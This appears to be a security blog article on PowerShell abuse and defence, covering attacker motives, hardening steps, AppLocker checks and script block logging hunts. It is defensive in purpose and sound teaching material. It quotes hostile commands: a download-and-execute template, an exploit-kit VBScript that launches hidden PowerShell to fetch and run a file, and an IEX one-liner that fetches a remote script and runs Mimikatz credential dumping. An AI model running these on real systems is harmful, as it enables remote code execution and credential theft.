TWO PHASES OF POWERSHELL: OFFENSIVE AND DEFENSIVE
PowerShell is a command-line shell and powerful scripting language for Windows. It has been around for more than 10 years, is used mainly by system administrators, and is set to replace the default command prompt on Windows.
PowerShell scripts are mostly used for legitimate administration work. They can also be used to protect computers from attacks and to perform analysis. However, attackers are also using PowerShell to build their own threats.
Windows PowerShell gives access to data stores such as the registry and the certificate store, and has a rich expression parser.
VERSIONS OF POWERSHELL
Windows version            Default PowerShell version
Windows 7 SP1              2.0
Windows 8                  3.0
Windows 8.1                4.0
Windows 10                 5.0
Windows Server 2008 R2     2.0
Windows Server 2012        3.0
Windows Server 2012 R2     4.0
Windows Server 2016        5.1
Here is the documentation provided by Microsoft:
Windows PowerShell provides some notable features:
- Cmdlets for common system administration tasks such as managing the registry, services, processes and event logs, and working with WMI
- Powerful object manipulation capabilities
- An extensible interface
- Simple command-based navigation that lets users browse the registry and other data stores the same way as the file system
- Consistent design
POWERSHELL INTEGRATED SCRIPTING ENVIRONMENT:
The Windows PowerShell Integrated Scripting Environment (ISE) is a host application that lets you write and test scripts and modules in a graphical environment.
WHY ARE ATTACKERS USING POWERSHELL?
- It is installed by default on all new Windows computers.
- It can execute payloads directly from memory, making it stealthy.
- It generates few traces by default, making it difficult to find under forensic analysis.
- It has remote access capabilities by default with encrypted traffic.
- As a script, it is easy to obfuscate and difficult to detect with traditional security tools.
- Defenders often overlook it when hardening their systems.
- It can bypass application whitelisting tools, depending on the configuration.
- Many gateway sandboxes do not handle script-based malware well.
- It has a growing community with readily available scripts.
- Many system administrators use and trust the framework, allowing PowerShell malware to blend in with regular administration work.
SCRIPT EXECUTION
In the majority of cases, PowerShell scripts are used post-exploitation as downloaders for additional payloads. While the Restricted execution policy prevents users from running PowerShell scripts with the .ps1 extension, attackers can use other extensions to get their scripts executed.
In malicious PowerShell scripts, the most frequently used commands and functions on the command line are:
→ (New-Object System.Net.WebClient).DownloadString()
→ (New-Object System.Net.WebClient).DownloadFile()
→ IEX / Invoke-Expression
→ Start-Process
A typical command to download and execute a remote file looks like the following:
powershell.exe (New-Object System.Net.WebClient).DownloadFile($URL,$LocalFileLocation);Start-Process $LocalFileLocation
EXPLOITS
Exploit kits have also been experimenting with PowerShell.
Recently, the Sundown exploit kit has been taking advantage of the Microsoft Internet Explorer Scripting Engine Remote Memory Corruption Vulnerability (CVE-2016-0189). These attacks exploit a flaw in the JScript and VBScript engines to execute code in Internet Explorer. The following is an example of this script (VBScript launching PowerShell; nburl and nbExe are the kit's own variables):
set shell=createobject("Shell.Application")
shell.ShellExecute "powershell.exe", "-nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c Import-Module BitsTransfer;Start-BitsTransfer " & nburl & " c:\" & nbExe & ";Invoke-Item c:\" & nbExe & ";';$s.UseShellExecute=$false;$p=[System.Diagnostics.Process]::Start($s);", "", "open", 0
SECURING WINDOWS WORKSTATIONS FROM POWERSHELL ATTACKS
Run free and near-free Microsoft tools to improve Windows security:
- Deploy Microsoft AppLocker to lock down what can run on the system
- Deploy LAPS to manage local administrator passwords
Disable legacy and typically unused Windows features:
- Disable WPAD
- Disable LLMNR
- Disable NetBIOS
- Make sure WDigest is disabled
Enable LSA protection
The Local Security Authority process (LSASS) validates users for local and remote sign-ins and enforces local security policies.
Disable net session enumeration
This removes the ability for any user to enumerate net session information.
It can be done with the following steps:
- Open the Group Policy Management Console, right-click the GPO (Group Policy Object) that should contain the new preference item, and click Edit
- In the console tree under Computer Configuration, expand the Preferences folder and then the Windows Settings folder
- Right-click the Registry node → New → Registry Wizard
- Select a reference workstation and click Next
- Browse to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\
- Select the check box for SrvsvcSessionInfo, the value from which you want to create the registry preference
- Select the check box for a key only if you want to create a registry item for the key rather than for a value within the key
- Finally, click Finish
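As an added example (not part of the original article), the following PowerShell script audits the same SrvsvcSessionInfo value that the wizard above targets. It decodes the REG_BINARY security descriptor and lists which accounts hold an entry in its DACL, flagging Authenticated Users (well-known SID S-1-5-11), whose allow entry is what lets every domain user enumerate sessions on the host. The script only reads the registry; the path and value name are the ones given in the steps above, and it assumes PowerShell 5 or later for the `::new()` syntax.

```powershell
# Added example, not from the original article: read-only audit of the
# SrvsvcSessionInfo security descriptor (PowerShell 5+ assumed).
$regPath   = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity'
$valueName = 'SrvsvcSessionInfo'
$authenticatedUsers = 'S-1-5-11'   # well-known SID for Authenticated Users

# The value is REG_BINARY holding a self-relative security descriptor.
$bytes = (Get-ItemProperty -Path $regPath -Name $valueName).$valueName
$sd = [System.Security.AccessControl.RawSecurityDescriptor]::new($bytes, 0)

# Walk the DACL and build one row per access control entry.
$report = foreach ($ace in $sd.DiscretionaryAcl) {
    $sid = $ace.SecurityIdentifier
    # Resolve to a friendly name where possible; keep the raw SID otherwise.
    try   { $account = $sid.Translate([System.Security.Principal.NTAccount]).Value }
    catch { $account = $sid.Value }
    [pscustomobject]@{
        Account    = $account
        Sid        = $sid.Value
        AceType    = $ace.AceType
        AccessMask = ('0x{0:X}' -f $ace.AccessMask)
    }
}

$report | Format-Table -AutoSize

# Any allow ACE for Authenticated Users means session enumeration is open to everyone.
$exposed = $report | Where-Object { $_.Sid -eq $authenticatedUsers -and $_.AceType -eq 'AccessAllowed' }
if ($exposed) {
    Write-Warning 'Authenticated Users can enumerate net sessions on this host; apply the GPO preference described above.'
} else {
    Write-Output 'Authenticated Users has no allow ACE on SrvsvcSessionInfo: net session enumeration is restricted.'
}
```

Run it on the reference workstation before and after the GPO preference is applied: the Authenticated Users row should disappear from the table on the hardened host while the Administrators and SYSTEM entries remain.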
Disable NetBIOS
Go to the network adapter properties → TCP/IPv4 properties → Advanced → WINS → Disable NetBIOS over TCP/IP
Disable unnecessary services on Windows Server 2016 Desktop Experience (based on the Microsoft Security Blog recommendations)
The script can be found at the following link:
List of awesome security hardening techniques for Windows
DETECT AND MITIGATE POWERSHELL ATTACKS
PowerShell has become a major threat against the Windows platform. There are several ways to mitigate and detect PowerShell attacks.
USING APPLOCKER:
AppLocker is included in Windows 10 Enterprise and provides a way to whitelist applications and scripts. When a user creates an AppLocker policy, it can apply to files, executables, packaged apps and scripts.
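As an added example (not part of the original article), this PowerShell snippet shows how an administrator can check what the effective AppLocker policy actually enforces and whether a given script would be allowed to run. It assumes an AppLocker-capable Windows edition with the AppLocker module available; the probe file it creates is a constructed, harmless script placed in the user's temp folder, which a script-whitelisting policy should refuse for standard users.

```powershell
# Added example, not from the original article: inspect the effective
# AppLocker policy and test a script against it (AppLocker module assumed).
Import-Module AppLocker

$policy = Get-AppLockerPolicy -Effective

# Which rule collections exist and whether they are enforced or audit-only.
# The Script collection is the one that governs .ps1, .bat, .cmd, .vbs and .js files.
$policy.RuleCollections |
    Select-Object RuleCollectionType, EnforcementMode |
    Format-Table -AutoSize

# Constructed probe: a harmless script in a user-writable location.
$probe = Join-Path $env:TEMP 'applocker-probe.ps1'
Set-Content -Path $probe -Value 'Write-Output "probe"'

$targets = @(
    'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',  # the host itself
    $probe                                                        # a script outside trusted paths
)

# PolicyDecision tells you what AppLocker would do for the given user.
$policy | Test-AppLockerPolicy -Path $targets -User 'Everyone' |
    Select-Object FilePath, PolicyDecision, MatchingRule |
    Format-Table -AutoSize

Remove-Item -Path $probe -ErrorAction SilentlyContinue
```

If the Script collection is missing or set to AuditOnly, the probe will be reported as allowed; that is the gap a PowerShell downloader dropped into a temp folder walks through.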
DETECT MALICIOUS POWERSHELL WITH SCRIPT BLOCK LOGGING:
PowerShell version 5 introduced several new ways to find malicious PowerShell. One of them is script block logging. This logging feature is on by default with PowerShell version 5 and gives clear-text logging of the scripts that PowerShell executes.
Let's say an attacker tries to hide their script:
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"
The attacker can turn the same command into an encoded form using Out-EncodedCommand.
But the PowerShell event logs still show exactly what the attacker ran.
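As an added example (not part of the original article), the script below does the two things a defender needs here: it switches on full script block logging through the policy registry key, and it hunts the resulting 4104 events in the Microsoft-Windows-PowerShell/Operational log for the patterns the article lists (DownloadString, DownloadFile, IEX, Invoke-Mimikatz) plus the base64 decoding calls an encoded command produces. The indicator list and the 160-character snippet length are my choices; enabling the policy requires an elevated prompt.

```powershell
# Added example, not from the original article: enable script block logging
# via the policy key, then hunt event 4104 for known-bad command patterns.
$logPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
if (-not (Test-Path $logPolicy)) { New-Item -Path $logPolicy -Force | Out-Null }
Set-ItemProperty -Path $logPolicy -Name 'EnableScriptBlockLogging' -Value 1 -Type DWord

# Indicators drawn from the article's examples (constructed list; extend to taste).
$indicators = @(
    'DownloadString', 'DownloadFile', 'Invoke-Expression', '\bIEX\b',
    'Invoke-Mimikatz', 'FromBase64String', 'EncodedCommand'
)
$pattern = $indicators -join '|'

function Find-SuspiciousScriptBlock {
    param([int]$MaxEvents = 2000)
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # 4104 payload layout: MessageNumber, MessageTotal, ScriptBlockText, ScriptBlockId, Path
            $text = [string]$_.Properties[2].Value
            if ($text -match $pattern) {
                [pscustomobject]@{
                    Time    = $_.TimeCreated
                    Level   = $_.LevelDisplayName
                    Path    = $_.Properties[4].Value
                    Matched = $Matches[0]
                    Snippet = ($text.Substring(0, [Math]::Min(160, $text.Length)) -replace '\s+', ' ')
                }
            }
        }
}

Find-SuspiciousScriptBlock | Format-Table -AutoSize -Wrap
```

Because script block logging records the block after PowerShell has decoded it, a command wrapped with Out-EncodedCommand still shows up in 4104 as the plain text above, which is why the encoding does not help the attacker here. Note that the hunt script itself contains the indicator strings, so expect one hit for its own execution.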
DISABLING THE POWERSHELL FEATURE
If a user has no need for PowerShell, they can disable the PowerShell feature to protect against PowerShell script injection.
One way to disable the PowerShell feature:
First, remove all users from the following folders. You can easily re-enable it by adding a user back.
C:\Program Files (x86)\WindowsPowerShell
C:\Program Files\WindowsPowerShell
C:\Windows\System32\WindowsPowerShell
C:\Windows\SysWOW64\WindowsPowerShell
We should also disable Windows Script Host (used for executing .JS, .JSE, .VBS and .VBE scripts):
reg add "HKCU\Software\Microsoft\Windows Script Host\Settings" /v "Enabled" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Microsoft\Windows Script Host\Settings" /v "Enabled" /t REG_DWORD /d "0" /f
CONCLUSION
If every attacker turns PowerShell into a deadly weapon, it is difficult for users to mitigate. So users have to study PowerShell and defend their systems before the attacker gets in. Be prepared and be secure. For an effective audit of your Windows and Microsoft environment, get in touch with us.